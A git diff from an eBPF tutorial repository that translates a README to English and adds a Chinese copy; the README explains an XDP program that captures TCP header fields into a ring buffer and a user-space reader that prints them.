内核中一个高性能的数据路径,允许在网络栈的最低层进行可编程的数据包处理。通过将 eBPF 程序附加到 XDP,我们可以在数据包到达时立即处理它们,减少延迟并提高效率。 +XDP is a high-performance data path within the Linux kernel that allows for programmable packet processing at the lowest level of the network stack. By attaching an eBPF program to XDP, we can process packets immediately as they arrive, reducing latency and improving efficiency. -## 内核 eBPF 代码分析 +## Kernel eBPF Code Analysis -让我们深入了解捕获 TCP 头信息的内核空间 eBPF 代码。 +Let's dive into the kernel-space eBPF code that captures TCP header information. -### 完整的内核代码 +### Full Kernel Code ```c #include "vmlinux.h" @@ -25,30 +25,30 @@ XDP 是 Linux 内核中一个高性能的数据路径,允许在网络栈的最 #define ETH_P_IP 0x0800 -// 定义环形缓冲区映射 +// Define the ring buffer map struct { __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 1 << 24); // 16 MB 缓冲区 + __uint(max_entries, 1 << 24); // 16 MB buffer } rb SEC(".maps"); -// 检查数据包是否为 TCP 的辅助函数 +// Helper function to check if the packet is TCP static bool is_tcp(struct ethhdr *eth, void *data_end) { - // 确保以太网头在边界内 + // Ensure Ethernet header is within bounds if ((void *)(eth + 1) > data_end) return false; - // 仅处理 IPv4 数据包 + // Only handle IPv4 packets if (bpf_ntohs(eth->h_proto) != ETH_P_IP) return false; struct iphdr *ip = (struct iphdr *)(eth + 1); - // 确保 IP 头在边界内 + // Ensure IP header is within bounds if ((void *)(ip + 1) > data_end) return false; - // 检查协议是否为 TCP + // Check if the protocol is TCP if (ip->protocol != IPPROTO_TCP) return false; @@ -58,65 +58,65 @@ static bool is_tcp(struct ethhdr *eth, void *data_end) SEC("xdp") int xdp_pass(struct xdp_md *ctx) { - // 数据包数据指针 + // Pointers to packet data void *data = (void *)(long)ctx->data; void *data_end = (void *)(long)ctx->data_end; - // 解析以太网头 + // Parse Ethernet header struct ethhdr *eth = data; - // 检查数据包是否为 TCP 数据包 + // Check if the packet is a TCP packet if (!is_tcp(eth, data_end)) { return XDP_PASS; } - // 转换为 IP 头 + // Cast to IP header struct iphdr *ip = (struct iphdr *)(eth + 1); - // 计算 IP 头长度 + // Calculate IP header length int ip_hdr_len = ip->ihl * 4; if (ip_hdr_len < sizeof(struct iphdr)) { return XDP_PASS; } - // 确保 IP 头在数据包边界内 + // Ensure IP header is within packet bounds if ((void *)ip + ip_hdr_len > data_end) { return XDP_PASS; } - // 解析 TCP 头 + // Parse TCP header struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len); - // 确保 TCP 头在数据包边界内 + // Ensure TCP header is within packet bounds if ((void *)(tcp + 1) > data_end) { return XDP_PASS; } - // 定义要捕获的 TCP 头字节数 + // Define the number of bytes you want to capture from the TCP header const int tcp_header_bytes = 32; - // 确保所需字节数不超过数据包边界 + // Ensure that the desired number of bytes does not exceed packet bounds if ((void *)tcp + tcp_header_bytes > data_end) { return XDP_PASS; } - // 在环形缓冲区中预留空间 + // Reserve space in the ring buffer void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); if (!ringbuf_space) { - return XDP_PASS; // 如果预留失败,跳过处理 + return XDP_PASS; // If reservation fails, skip processing } - // 将 TCP 头字节复制到环形缓冲区 - // 使用循环以确保符合 eBPF 验证器要求 + // Copy the TCP header bytes into the ring buffer + // Using a loop to ensure compliance with eBPF verifier for (int i = 0; i < tcp_header_bytes; i++) { unsigned char byte = *((unsigned char *)tcp + i); ((unsigned char *)ringbuf_space)[i] = byte; } - // 将数据提交到环形缓冲区 + // Submit the data to the ring buffer bpf_ringbuf_submit(ringbuf_space, 0); - // 可选:打印调试信息 + // Optional: Print a debug message bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); return XDP_PASS; @@ -125,70 +125,70 @@ int xdp_pass(struct xdp_md *ctx) char __license[] SEC("license") = "GPL"; ``` -### 代码解释 +### Code Explanation -#### 定义环形缓冲区映射 +#### Defining the Ring Buffer Map -我们定义了一个名为 `rb` 的环形缓冲区映射,用于高效地将数据从内核传递到用户空间。 +We define a ring buffer map named `rb` to pass data from the kernel to user space efficiently. ```c struct { __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 1 << 24); // 16 MB 缓冲区 + __uint(max_entries, 1 << 24); // 16 MB buffer } rb SEC(".maps"); ``` -#### 数据包解析与验证 +#### Packet Parsing and Validation -`is_tcp` 辅助函数通过验证以太网和 IP 头,检查传入的数据包是否为 TCP 数据包。 +The `is_tcp` helper function checks whether the incoming packet is a TCP packet by verifying the Ethernet and IP headers. ```c static bool is_tcp(struct ethhdr *eth, void *data_end) { - // ...(检查内容略) + // ... (checks omitted for brevity) } ``` -#### 捕获 TCP 头信息 +#### Capturing TCP Header Information -在 `xdp_pass` 函数中,我们: +In the `xdp_pass` function, we: -1. 解析以太网、IP 和 TCP 头。 -2. 确保所有头信息在数据包边界内,以防止无效内存访问。 -3. 在环形缓冲区中预留空间以存储 TCP 头。 -4. 将 TCP 头字节复制到环形缓冲区。 -5. 提交数据到环形缓冲区,供用户空间使用。 +1. Parse the Ethernet, IP, and TCP headers. +2. Ensure all headers are within the packet bounds to prevent invalid memory access. +3. Reserve space in the ring buffer to store the TCP header. +4. Copy the TCP header bytes into the ring buffer. +5. Submit the data to the ring buffer for user-space consumption. ```c -// 在环形缓冲区中预留空间 +// Reserve space in the ring buffer void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); if (!ringbuf_space) { return XDP_PASS; } -// 复制 TCP 头字节 +// Copy the TCP header bytes for (int i = 0; i < tcp_header_bytes; i++) { unsigned char byte = *((unsigned char *)tcp + i); ((unsigned char *)ringbuf_space)[i] = byte; } -// 提交到环形缓冲区 +// Submit to ring buffer bpf_ringbuf_submit(ringbuf_space, 0); ``` -#### 使用 bpf_printk 进行调试 +#### Using bpf_printk for Debugging -`bpf_printk` 函数将消息记录到内核的跟踪管道,对于调试非常有用。 +The `bpf_printk` function logs messages to the kernel's trace pipe, which can be invaluable for debugging. ```c bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); ``` -## 用户空间代码分析 +## User-Space Code Analysis -让我们查看用户空间程序,该程序从环形缓冲区中读取捕获的 TCP 头信息并显示。 +Let's examine the user-space program that reads the captured TCP headers from the ring buffer and displays them. -### 完整的用户空间代码 +### Full User-Space Code ```c #include @@ -201,17 +201,17 @@ bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); #include #include -#include "xdp-tcpdump.skel.h" // 生成的骨架头文件 +#include "xdp-tcpdump.skel.h" // Generated skeleton header -// 处理环形缓冲区事件的回调函数 +// Callback function to handle events from the ring buffer static int handle_event(void *ctx, void *data, size_t data_sz) { - if (data_sz < 20) { // 最小 TCP 头大小 + if (data_sz < 20) { // Minimum TCP header size fprintf(stderr, "Received incomplete TCP header\n"); return 0; } - // 解析原始 TCP 头字节 + // Parse the raw TCP header bytes struct tcphdr { uint16_t source; uint16_t dest; @@ -230,7 +230,7 @@ static int handle_event(void *ctx, void *data, size_t data_sz) uint16_t window; uint16_t check; uint16_t urg_ptr; - // 可能还有选项和填充 + // Options and padding may follow } __attribute__((packed)); if (data_sz < sizeof(struct tcphdr)) { @@ -240,14 +240,14 @@ static int handle_event(void *ctx, void *data, size_t data_sz) struct tcphdr *tcp = (struct tcphdr *)data; - // 将字段从网络字节序转换为主机字节序 + // Convert fields from network byte order to host byte order uint16_t source_port = ntohs(tcp->source); uint16_t dest_port = ntohs(tcp->dest); uint32_t seq = ntohl(tcp->seq); uint32_t ack_seq = ntohl(tcp->ack_seq); uint16_t window = ntohs(tcp->window); - // 提取标志位 + // Extract flags uint8_t flags = 0; flags |= (tcp->fin) ? 0x01 : 0x00; flags |= (tcp->syn) ? 0x02 : 0x00; @@ -259,13 +259,13 @@ static int handle_event(void *ctx, void *data, size_t data_sz) flags |= (tcp->cwr) ? 0x80 : 0x00; printf("Captured TCP Header:\n"); - printf(" 源端口: %u\n", source_port); - printf(" 目的端口: %u\n", dest_port); - printf(" 序列号: %u\n", seq); - printf(" 确认号: %u\n", ack_seq); - printf(" 数据偏移: %u\n", tcp->doff); - printf(" 标志位: 0x%02x\n", flags); - printf(" 窗口大小: %u\n", window); + printf(" Source Port: %u\n", source_port); + printf(" Destination Port: %u\n", dest_port); + printf(" Sequence Number: %u\n", seq); + printf(" Acknowledgment Number: %u\n", ack_seq); + printf(" Data Offset: %u\n", tcp->doff); + printf(" Flags: 0x%02x\n", flags); + printf(" Window Size: %u\n", window); printf("\n"); return 0; @@ -292,7 +292,7 @@ int main(int argc, char **argv) return 1; } - /* 打开并加载 BPF 应用 */ + /* Open and load BPF application */ skel = xdp_tcpdump_bpf__open(); if (!skel) { @@ -300,7 +300,7 @@ int main(int argc, char **argv) return 1; } - /* 加载并验证 BPF 程序 */ + /* Load & verify BPF programs */ err = xdp_tcpdump_bpf__load(skel); if (err) { @@ -308,7 +308,7 @@ int main(int argc, char **argv) goto cleanup; } - /* 附加 XDP 程序 */ + /* Attach XDP program */ err = xdp_tcpdump_bpf__attach(skel); if (err) { @@ -316,7 +316,7 @@ int main(int argc, char **argv) goto cleanup; } - /* 将 XDP 程序附加到指定的接口 */ + /* Attach the XDP program to the specified interface */ skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); if (!skel->links.xdp_pass) { @@ -325,9 +325,9 @@ int main(int argc, char **argv) goto cleanup; } - printf("成功将 XDP 程序附加到接口 %s\n", ifname); + printf("Successfully attached XDP program to interface %s\n", ifname); - /* 设置环形缓冲区轮询 */ + /* Set up ring buffer polling */ rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); if (!rb) { @@ -336,9 +336,9 @@ int main(int argc, char **argv) goto cleanup; } - printf("开始轮询环形缓冲区\n"); + printf("Start polling ring buffer\n"); - /* 轮询环形缓冲区 */ + /* Poll the ring buffer */ while (1) { err = ring_buffer__poll(rb, -1); @@ -358,29 +358,29 @@ cleanup: } ``` -### 代码解释 +### Code Explanation -#### 处理环形缓冲区事件 +#### Handling Ring Buffer Events -`handle_event` 函数处理从环形缓冲区接收到的 TCP 头数据。 +The `handle_event` function processes TCP header data received from the ring buffer. ```c static int handle_event(void *ctx, void *data, size_t data_sz) { - // 验证数据大小 + // Validate data size if (data_sz < 20) { fprintf(stderr, "Received incomplete TCP header\n"); return 0; } - // 解析 TCP 头 - // ...(解析代码) + // Parse the TCP header + // ... (parsing code) } ``` -#### 解析 TCP 头 +#### Parsing the TCP Header -我们定义了一个本地的 `tcphdr` 结构来解释原始字节。 +We define a local `tcphdr` structure to interpret the raw bytes. ```c struct tcphdr { @@ -388,34 +388,34 @@ struct tcphdr { uint16_t dest; uint32_t seq; uint32_t ack_seq; - // ...(其他字段) + // ... (other fields) } __attribute__((packed)); ``` -#### 显示捕获的信息 +#### Displaying Captured Information -解析后,我们以可读的格式打印 TCP 头字段。 +After parsing, we print the TCP header fields in a readable format. ```c printf("Captured TCP Header:\n"); -printf(" 源端口: %u\n", source_port); -printf(" 目的端口: %u\n", dest_port); -// ...(其他字段) +printf(" Source Port: %u\n", source_port); +printf(" Destination Port: %u\n", dest_port); +// ... (other fields) ``` -#### 设置 eBPF 骨架 +#### Setting Up the eBPF Skeleton -我们使用生成的骨架 `xdp-tcpdump.skel.h` 来加载和附加 eBPF 程序。 +We use the generated skeleton `xdp-tcpdump.skel.h` to load and attach the eBPF program. ```c -/* 打开并加载 BPF 应用 */ +/* Open and load BPF application */ skel = xdp_tcpdump_bpf__open(); if (!skel) { fprintf(stderr, "Failed to open BPF skeleton\n"); return 1; } -/* 加载并验证 BPF 程序 */ +/* Load & verify BPF programs */ err = xdp_tcpdump_bpf__load(skel); if (err) { fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); @@ -423,12 +423,11 @@ if (err) { } ``` -#### 附加到网络接口 +#### Attaching to the Network Interface -我们通过接口名称将 XDP 程序附加到指定的网络接口。 +We attach the XDP program to the specified network interface by name. ```c -/* 将 XDP 程序附加到指定的接口 */ skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); if (!skel->links.xdp_pass) { err = -errno; @@ -437,34 +436,34 @@ if (!skel->links.xdp_pass) { } ``` -## 编译和执行说明 +## Compilation and Execution Instructions -### 前提条件 +### Prerequisites -- 支持 eBPF 和 XDP 的 Linux 系统内核。 -- 安装了 libbpf 库。 -- 具有 eBPF 支持的编译器(如 clang)。 +- A Linux system with a kernel version that supports eBPF and XDP. +- libbpf library installed. +- Compiler with eBPF support (clang). -### 构建程序 +### Building the Program -假设您已从 [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial) 克隆了仓库,请导航到 `bpf-developer-tutorial/src/41-xdp-tcpdump` 目录。 +Assuming you have cloned the repository from [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial), navigate to the `bpf-developer-tutorial/src/41-xdp-tcpdump` directory. ```bash cd bpf-developer-tutorial/src/41-xdp-tcpdump make ``` -此命令将编译内核 eBPF 代码和用户空间应用程序。 +This command compiles both the kernel eBPF code and the user-space application. -### 运行程序 +### Running the Program -首先,识别您的网络接口: +First, identify your network interfaces: ```bash ifconfig ``` -示例输出: +Sample output: ``` wlp0s20f3: flags=4163 mtu 1500 @@ -472,38 +471,38 @@ wlp0s20f3: flags=4163 mtu 1500 ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) ``` -使用所需的网络接口运行用户空间程序: +Run the user-space program with the desired network interface: ```bash sudo ./xdp-tcpdump wlp0s20f3 ``` -示例输出: +Sample output: ``` -成功将 XDP 程序附加到接口 wlp0s20f3 -开始轮询环形缓冲区 +Successfully attached XDP program to interface wlp0s20f3 +Start polling ring buffer Captured TCP Header: - 源端口: 443 - 目的端口: 53500 - 序列号: 572012449 - 确认号: 380198588 - 数据偏移: 8 - 标志位: 0x10 - 窗口大小: 16380 + Source Port: 443 + Destination Port: 53500 + Sequence Number: 572012449 + Acknowledgment Number: 380198588 + Data Offset: 8 + Flags: 0x10 + Window Size: 16380 ``` -### 完整的源代码和资源 +### Complete Source Code and Resources -- **源代码仓库:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -- **教程网站:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) +- **Source Code Repository:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) +- **Tutorial Website:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) -## 总结与结论 +## Summary and Conclusion -在本教程中,我们探讨了如何使用 eBPF 和 XDP 在 Linux 内核中直接捕获 TCP 头信息。通过分析内核 eBPF 代码和用户空间应用程序,我们学习了如何拦截数据包、提取关键的 TCP 字段,并使用环形缓冲区高效地将这些数据传递到用户空间。 +In this tutorial, we explored how to use eBPF and XDP to capture TCP header information directly within the Linux kernel. By analyzing both the kernel eBPF code and the user-space application, we learned how to intercept packets, extract essential TCP fields, and communicate this data to user space efficiently using a ring buffer. -这种方法为传统的数据包捕获方法提供了一种高性能的替代方案,对系统资源的影响最小。它是网络监控、安全分析和调试的强大技术。 +This approach offers a high-performance alternative to traditional packet capturing methods, with minimal impact on system resources. It's a powerful technique for network monitoring, security analysis, and debugging. -如果您想了解更多关于 eBPF 的内容,请访问我们的教程代码仓库 或我们的网站 。 +If you would like to learn more about eBPF, visit our tutorial code repository at or our website at . -编程愉快! \ No newline at end of file +Happy coding! diff --git a/src/41-xdp-tcpdump/README.zh.md b/src/41-xdp-tcpdump/README.zh.md new file mode 100644 index 0000000..3a78eae --- /dev/null +++ b/src/41-xdp-tcpdump/README.zh.md @@ -0,0 +1,509 @@ +# eBPF 示例教程:使用 XDP 捕获 TCP 信息 + +扩展伯克利包过滤器(eBPF)是 Linux 内核中的一项革命性技术,允许开发者在内核空间内运行沙箱程序。它提供了强大的网络、安全和跟踪能力,无需修改内核源代码或加载内核模块。本教程重点介绍如何使用 eBPF 结合 Express Data Path(XDP),在数据包进入时的最早阶段直接捕获 TCP 头信息。 + +## 使用 XDP 捕获 TCP 头信息 + +捕获网络数据包对于监控、调试和保护网络通信至关重要。传统工具如 `tcpdump` 在用户空间运行,可能会带来显著的开销。通过利用 eBPF 和 XDP,我们可以在内核中直接捕获 TCP 头信息,最小化开销并提高性能。 + +在本教程中,我们将开发一个 XDP 程序,该程序拦截传入的 TCP 数据包并提取其头信息。我们将这些数据存储在一个环形缓冲区中,用户空间的程序将读取并以可读的格式显示这些信息。 + +### 为什么使用 XDP 进行数据包捕获? + +XDP 是 Linux 内核中一个高性能的数据路径,允许在网络栈的最低层进行可编程的数据包处理。通过将 eBPF 程序附加到 XDP,我们可以在数据包到达时立即处理它们,减少延迟并提高效率。 + +## 内核 eBPF 代码分析 + +让我们深入了解捕获 TCP 头信息的内核空间 eBPF 代码。 + +### 完整的内核代码 + +```c +#include "vmlinux.h" +#include +#include + +#define ETH_P_IP 0x0800 + +// 定义环形缓冲区映射 +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 1 << 24); // 16 MB 缓冲区 +} rb SEC(".maps"); + +// 检查数据包是否为 TCP 的辅助函数 +static bool is_tcp(struct ethhdr *eth, void *data_end) +{ + // 确保以太网头在边界内 + if ((void *)(eth + 1) > data_end) + return false; + + // 仅处理 IPv4 数据包 + if (bpf_ntohs(eth->h_proto) != ETH_P_IP) + return false; + + struct iphdr *ip = (struct iphdr *)(eth + 1); + + // 确保 IP 头在边界内 + if ((void *)(ip + 1) > data_end) + return false; + + // 检查协议是否为 TCP + if (ip->protocol != IPPROTO_TCP) + return false; + + return true; +} + +SEC("xdp") +int xdp_pass(struct xdp_md *ctx) +{ + // 数据包数据指针 + void *data = (void *)(long)ctx->data; + void *data_end = (void *)(long)ctx->data_end; + + // 解析以太网头 + struct ethhdr *eth = data; + + // 检查数据包是否为 TCP 数据包 + if (!is_tcp(eth, data_end)) { + return XDP_PASS; + } + + // 转换为 IP 头 + struct iphdr *ip = (struct iphdr *)(eth + 1); + + // 计算 IP 头长度 + int ip_hdr_len = ip->ihl * 4; + if (ip_hdr_len < sizeof(struct iphdr)) { + return XDP_PASS; + } + + // 确保 IP 头在数据包边界内 + if ((void *)ip + ip_hdr_len > data_end) { + return XDP_PASS; + } + + // 解析 TCP 头 + struct tcphdr *tcp = (struct tcphdr *)((unsigned char *)ip + ip_hdr_len); + + // 确保 TCP 头在数据包边界内 + if ((void *)(tcp + 1) > data_end) { + return XDP_PASS; + } + + // 定义要捕获的 TCP 头字节数 + const int tcp_header_bytes = 32; + + // 确保所需字节数不超过数据包边界 + if ((void *)tcp + tcp_header_bytes > data_end) { + return XDP_PASS; + } + + // 在环形缓冲区中预留空间 + void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); + if (!ringbuf_space) { + return XDP_PASS; // 如果预留失败,跳过处理 + } + + // 将 TCP 头字节复制到环形缓冲区 + // 使用循环以确保符合 eBPF 验证器要求 + for (int i = 0; i < tcp_header_bytes; i++) { + unsigned char byte = *((unsigned char *)tcp + i); + ((unsigned char *)ringbuf_space)[i] = byte; + } + + // 将数据提交到环形缓冲区 + bpf_ringbuf_submit(ringbuf_space, 0); + + // 可选:打印调试信息 + bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); + + return XDP_PASS; +} + +char __license[] SEC("license") = "GPL"; +``` + +### 代码解释 + +#### 定义环形缓冲区映射 + +我们定义了一个名为 `rb` 的环形缓冲区映射,用于高效地将数据从内核传递到用户空间。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 1 << 24); // 16 MB 缓冲区 +} rb SEC(".maps"); +``` + +#### 数据包解析与验证 + +`is_tcp` 辅助函数通过验证以太网和 IP 头,检查传入的数据包是否为 TCP 数据包。 + +```c +static bool is_tcp(struct ethhdr *eth, void *data_end) +{ + // ...(检查内容略) +} +``` + +#### 捕获 TCP 头信息 + +在 `xdp_pass` 函数中,我们: + +1. 解析以太网、IP 和 TCP 头。 +2. 确保所有头信息在数据包边界内,以防止无效内存访问。 +3. 在环形缓冲区中预留空间以存储 TCP 头。 +4. 将 TCP 头字节复制到环形缓冲区。 +5. 提交数据到环形缓冲区,供用户空间使用。 + +```c +// 在环形缓冲区中预留空间 +void *ringbuf_space = bpf_ringbuf_reserve(&rb, tcp_header_bytes, 0); +if (!ringbuf_space) { + return XDP_PASS; +} + +// 复制 TCP 头字节 +for (int i = 0; i < tcp_header_bytes; i++) { + unsigned char byte = *((unsigned char *)tcp + i); + ((unsigned char *)ringbuf_space)[i] = byte; +} + +// 提交到环形缓冲区 +bpf_ringbuf_submit(ringbuf_space, 0); +``` + +#### 使用 bpf_printk 进行调试 + +`bpf_printk` 函数将消息记录到内核的跟踪管道,对于调试非常有用。 + +```c +bpf_printk("Captured TCP header (%d bytes)", tcp_header_bytes); +``` + +## 用户空间代码分析 + +让我们查看用户空间程序,该程序从环形缓冲区中读取捕获的 TCP 头信息并显示。 + +### 完整的用户空间代码 + +```c +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "xdp-tcpdump.skel.h" // 生成的骨架头文件 + +// 处理环形缓冲区事件的回调函数 +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + if (data_sz < 20) { // 最小 TCP 头大小 + fprintf(stderr, "Received incomplete TCP header\n"); + return 0; + } + + // 解析原始 TCP 头字节 + struct tcphdr { + uint16_t source; + uint16_t dest; + uint32_t seq; + uint32_t ack_seq; + uint16_t res1:4, + doff:4, + fin:1, + syn:1, + rst:1, + psh:1, + ack:1, + urg:1, + ece:1, + cwr:1; + uint16_t window; + uint16_t check; + uint16_t urg_ptr; + // 可能还有选项和填充 + } __attribute__((packed)); + + if (data_sz < sizeof(struct tcphdr)) { + fprintf(stderr, "Data size (%zu) less than TCP header size\n", data_sz); + return 0; + } + + struct tcphdr *tcp = (struct tcphdr *)data; + + // 将字段从网络字节序转换为主机字节序 + uint16_t source_port = ntohs(tcp->source); + uint16_t dest_port = ntohs(tcp->dest); + uint32_t seq = ntohl(tcp->seq); + uint32_t ack_seq = ntohl(tcp->ack_seq); + uint16_t window = ntohs(tcp->window); + + // 提取标志位 + uint8_t flags = 0; + flags |= (tcp->fin) ? 0x01 : 0x00; + flags |= (tcp->syn) ? 0x02 : 0x00; + flags |= (tcp->rst) ? 0x04 : 0x00; + flags |= (tcp->psh) ? 0x08 : 0x00; + flags |= (tcp->ack) ? 0x10 : 0x00; + flags |= (tcp->urg) ? 0x20 : 0x00; + flags |= (tcp->ece) ? 0x40 : 0x00; + flags |= (tcp->cwr) ? 0x80 : 0x00; + + printf("Captured TCP Header:\n"); + printf(" 源端口: %u\n", source_port); + printf(" 目的端口: %u\n", dest_port); + printf(" 序列号: %u\n", seq); + printf(" 确认号: %u\n", ack_seq); + printf(" 数据偏移: %u\n", tcp->doff); + printf(" 标志位: 0x%02x\n", flags); + printf(" 窗口大小: %u\n", window); + printf("\n"); + + return 0; +} + +int main(int argc, char **argv) +{ + struct xdp_tcpdump_bpf *skel; + struct ring_buffer *rb = NULL; + int ifindex; + int err; + + if (argc != 2) + { + fprintf(stderr, "Usage: %s \n", argv[0]); + return 1; + } + + const char *ifname = argv[1]; + ifindex = if_nametoindex(ifname); + if (ifindex == 0) + { + fprintf(stderr, "Invalid interface name %s\n", ifname); + return 1; + } + + /* 打开并加载 BPF 应用 */ + skel = xdp_tcpdump_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; + } + + /* 加载并验证 BPF 程序 */ + err = xdp_tcpdump_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); + goto cleanup; + } + + /* 附加 XDP 程序 */ + err = xdp_tcpdump_bpf__attach(skel); + if (err) + { + fprintf(stderr, "Failed to attach BPF skeleton: %d\n", err); + goto cleanup; + } + + /* 将 XDP 程序附加到指定的接口 */ + skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); + if (!skel->links.xdp_pass) + { + err = -errno; + fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); + goto cleanup; + } + + printf("成功将 XDP 程序附加到接口 %s\n", ifname); + + /* 设置环形缓冲区轮询 */ + rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); + if (!rb) + { + fprintf(stderr, "Failed to create ring buffer\n"); + err = -1; + goto cleanup; + } + + printf("开始轮询环形缓冲区\n"); + + /* 轮询环形缓冲区 */ + while (1) + { + err = ring_buffer__poll(rb, -1); + if (err == -EINTR) + continue; + if (err < 0) + { + fprintf(stderr, "Error polling ring buffer: %d\n", err); + break; + } + } + +cleanup: + ring_buffer__free(rb); + xdp_tcpdump_bpf__destroy(skel); + return -err; +} +``` + +### 代码解释 + +#### 处理环形缓冲区事件 + +`handle_event` 函数处理从环形缓冲区接收到的 TCP 头数据。 + +```c +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + // 验证数据大小 + if (data_sz < 20) { + fprintf(stderr, "Received incomplete TCP header\n"); + return 0; + } + + // 解析 TCP 头 + // ...(解析代码) +} +``` + +#### 解析 TCP 头 + +我们定义了一个本地的 `tcphdr` 结构来解释原始字节。 + +```c +struct tcphdr { + uint16_t source; + uint16_t dest; + uint32_t seq; + uint32_t ack_seq; + // ...(其他字段) +} __attribute__((packed)); +``` + +#### 显示捕获的信息 + +解析后,我们以可读的格式打印 TCP 头字段。 + +```c +printf("Captured TCP Header:\n"); +printf(" 源端口: %u\n", source_port); +printf(" 目的端口: %u\n", dest_port); +// ...(其他字段) +``` + +#### 设置 eBPF 骨架 + +我们使用生成的骨架 `xdp-tcpdump.skel.h` 来加载和附加 eBPF 程序。 + +```c +/* 打开并加载 BPF 应用 */ +skel = xdp_tcpdump_bpf__open(); +if (!skel) { + fprintf(stderr, "Failed to open BPF skeleton\n"); + return 1; +} + +/* 加载并验证 BPF 程序 */ +err = xdp_tcpdump_bpf__load(skel); +if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton: %d\n", err); + goto cleanup; +} +``` + +#### 附加到网络接口 + +我们通过接口名称将 XDP 程序附加到指定的网络接口。 + +```c +/* 将 XDP 程序附加到指定的接口 */ +skel->links.xdp_pass = bpf_program__attach_xdp(skel->progs.xdp_pass, ifindex); +if (!skel->links.xdp_pass) { + err = -errno; + fprintf(stderr, "Failed to attach XDP program: %s\n", strerror(errno)); + goto cleanup; +} +``` + +## 编译和执行说明 + +### 前提条件 + +- 支持 eBPF 和 XDP 的 Linux 系统内核。 +- 安装了 libbpf 库。 +- 具有 eBPF 支持的编译器(如 clang)。 + +### 构建程序 + +假设您已从 [GitHub](https://github.com/eunomia-bpf/bpf-developer-tutorial) 克隆了仓库,请导航到 `bpf-developer-tutorial/src/41-xdp-tcpdump` 目录。 + +```bash +cd bpf-developer-tutorial/src/41-xdp-tcpdump +make +``` + +此命令将编译内核 eBPF 代码和用户空间应用程序。 + +### 运行程序 + +首先,识别您的网络接口: + +```bash +ifconfig +``` + +示例输出: + +``` +wlp0s20f3: flags=4163 mtu 1500 + inet 192.168.1.10 netmask 255.255.255.0 broadcast 192.168.1.255 + ether 00:1a:2b:3c:4d:5e txqueuelen 1000 (Ethernet) +``` + +使用所需的网络接口运行用户空间程序: + +```bash +sudo ./xdp-tcpdump wlp0s20f3 +``` + +示例输出: + +``` +成功将 XDP 程序附加到接口 wlp0s20f3 +开始轮询环形缓冲区 +Captured TCP Header: + 源端口: 443 + 目的端口: 53500 + 序列号: 572012449 + 确认号: 380198588 + 数据偏移: 8 + 标志位: 0x10 + 窗口大小: 16380 +``` + +### 完整的源代码和资源 + +- **源代码仓库:** [GitHub - bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) +- **教程网站:** [eunomia.dev Tutorials](https://eunomia.dev/tutorials/) + +## 总结与结论 + +在本教程中,我们探讨了如何使用 eBPF 和 XDP 在 Linux 内核中直接捕获 TCP 头信息。通过分析内核 eBPF 代码和用户空间应用程序,我们学习了如何拦截数据包、提取关键的 TCP 字段,并使用环形缓冲区高效地将这些数据传递到用户空间。 + +这种方法为传统的数据包捕获方法提供了一种高性能的替代方案,对系统资源的影响最小。它是网络监控、安全分析和调试的强大技术。 + +如果您想了解更多关于 eBPF 的内容,请访问我们的教程代码仓库 或我们的网站 。 + +编程愉快! \ No newline at end of file diff --git a/src/41-xdp-tcpdump/README_en.md b/src/41-xdp-tcpdump/README_en.md deleted file mode 100644 index b9a0764..0000000 --- a/src/41-xdp-tcpdump/README_en.md +++ /dev/null @@ -1,508 +0,0 @@ -# eBPF Tutorial by Example: Capturing TCP Information with XDP - -Extended Berkeley Packet Filter (eBPF) is a revolutionary technology in the Linux kernel that allows developers to run sandboxed programs within the kernel space. It enables powerful networking, security, and tracing capabilities without the need to modify the kernel source code or load kernel modules. This tutorial focuses on using eBPF with the Express Data Path (XDP) to capture TCP header information directly from network packets at the earliest point of ingress. - -## Capturing TCP Headers with XDP - -Capturing network packets is essential for monitoring, debugging, and securing network communications. Traditional tools like `tcpdump` operate in user space and can incur significant overhead. By leveraging eBPF and XDP, we can capture TCP header information directly within the kernel, minimizing overhead and improving performance. - -In this tutorial, we'll develop an XDP program that intercepts incoming TCP packets and extracts their header information. We'll store this data in a ring buffer, which a user-space program will read and display in a human-readable format. - -### Why Use XDP for Packet Capturing? - -XDP is a high-performance data path within the Linux kernel that allows for programmable packet processing at the lowest level of the network stack. By attaching an eBPF program to XDP, we can process packets immediately as they arrive, reducing latency and improving efficiency. - -## Kernel eBPF Code Analysis - -Let's dive into the kernel-space eBPF code that captures TCP header information. - -### Full Kernel Code - -```c -#include "vmlinux.h" -#include -#include - -#define ETH_P_IP 